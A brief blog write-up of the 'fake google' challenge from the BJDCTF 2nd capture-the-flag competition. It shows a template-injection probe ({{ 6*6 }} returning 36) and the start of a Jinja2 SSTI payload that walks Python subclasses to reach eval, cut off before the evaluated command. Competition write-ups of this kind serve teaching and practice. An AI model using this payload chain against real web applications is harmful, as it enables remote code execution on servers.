BJDCTF 2nd wp

2020-03-25 19:03:00 582
ctf - wp - BJDCTF

fake google: after a search in the Google-style search box, the page source hints at SSTI. Trying {{ 6*6 }} printed 36. exp: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %} {{ c.__init__.__globals__['__builtins__']['eval']("...



CopyRight © 2019 HhhM